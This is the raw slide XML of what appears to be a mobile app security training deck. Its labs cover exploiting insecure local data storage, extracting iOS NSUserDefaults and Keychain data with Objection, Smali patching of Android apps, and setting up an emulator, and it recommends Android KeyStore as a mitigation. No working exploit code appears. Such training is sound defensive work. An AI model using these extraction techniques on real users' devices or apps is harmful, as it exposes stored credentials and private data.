                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2871DA91-446C-4006-A790-0D9201A29ACC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1389067689"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5655627" y="5607235"/>
          <a:ext cx="3266159" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3266159">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Total : $ 4550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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309178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Configuration</a:t>
            </a:r>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1BC9C35-4840-1C45-7D55-302537F89547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1230833"/>
            <a:ext cx="7772400" cy="5068956"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3701291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600" b="1" dirty="0"/>
              <a:t>Mitigation :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>recommend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>KeyStore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> local data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>www.androidauthority.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/use-android-keystore-store-passwords-sensitive-information-623779/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1"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Exercice 8 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Local Storage</a:t>
            </a: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ool&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DB72C8-68AE-44EB-8C95-BD0880784DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="21667" r="22639"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434874" y="4457700"/>
            <a:ext cx="2274252" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19896774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dirty="0"/>
              <a:t>And …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Table 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2594726" y="2940049"/>
          <a:ext cx="3747381" cy="582930"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3747381">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1822739905"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>What about iOS ?</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pic>
        <p:nvPicPr>
          <p:cNvPr id="14340" name="Picture 4" descr="Stickers sur le thème Question Emoji | Redbubble">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1886D4-46CE-6586-86BF-F9B7387D1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558" y="3710562"/>
            <a:ext cx="1069716" cy="106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2319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endParaRPr lang="fr-FR" sz="1600" b="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Exercice 6 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Data Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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8729" y="1447801"/>
            <a:ext cx="6319660" cy="4338320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226261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dirty="0" err="1"/>
              <a:t>Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>NSUserdefaults</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Objection</a:t>
            </a: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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Data Storage</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498"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="2125116"/>
            <a:ext cx="3410393" cy="4248000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095558" y="2125116"/>
            <a:ext cx="4907818" cy="4235354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24714053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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Data Storage</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8729" y="1479586"/>
            <a:ext cx="6202680" cy="3898828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2478155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dirty="0" err="1"/>
              <a:t>Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Keychain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Objection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Data Storage</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280581" y="2110740"/>
            <a:ext cx="3929244" cy="4389120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17516163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dirty="0" err="1"/>
              <a:t>Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Keychain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Objection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Data Storage</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389C517-152B-4BF7-99BB-C1061544EDAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="423254" y="1957049"/>
            <a:ext cx="8580122" cy="4288336"/>
            <a:chOff x="380197" y="1969245"/>
            <a:chExt cx="8580122" cy="4288336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4"/>
            <a:srcRect b="5224"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="380197" y="1969245"/>
              <a:ext cx="8580122" cy="4288336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22EA9C4-8590-415D-89A6-BB0F7976312F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8505022" y="5846419"/>
              <a:ext cx="416765" cy="398966"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0D0B0D"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="0D0B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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3387114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just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Grapefruit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of the local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> system in use :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="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6 : Exploiting Insecure Data Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  [Solution] </a:t>
            </a:r>
          </a:p>
          <a:p>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creen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 y="2266296"/>
            <a:ext cx="7130180" cy="453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7215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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Assembly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>dex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> format, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Android’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Dalvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> machine.</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a:t>Reverse Engineering (Smali Patch)</a:t>
            </a:r>
          </a:p>
          <a:p>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Java compilation process vs Android compilation process with the extra step for the dex compi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951" y="2339875"/>
            <a:ext cx="3847950" cy="32497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49951" y="5913166"/>
            <a:ext cx="4572000" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Java compilation process vs Android compilation process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41009230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E07738-4885-4A28-A95C-F3853DC17126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Labs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C83F6F-A3BC-46D0-B21A-A39F88E10934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Reverse Engineering (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Smali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Patch)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Android Reverse Engineering (ARE) | Roshan Piyush&amp;#39;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617" y="2372519"/>
            <a:ext cx="76581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51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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Let's create an Android Virtual Device (AVD) by launching Android Studio :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="180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Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2425357"/>
            <a:ext cx="4219722" cy="3764808"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"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30EA9C-AB05-3C59-1EFB-5203523FA4C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258474" y="1963511"/>
            <a:ext cx="5974713" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" defTabSz="914400">
              <a:buClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="200000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>android</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-studio/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>studio.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A6CBE3A-3441-5572-F042-C4DBB893C51D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
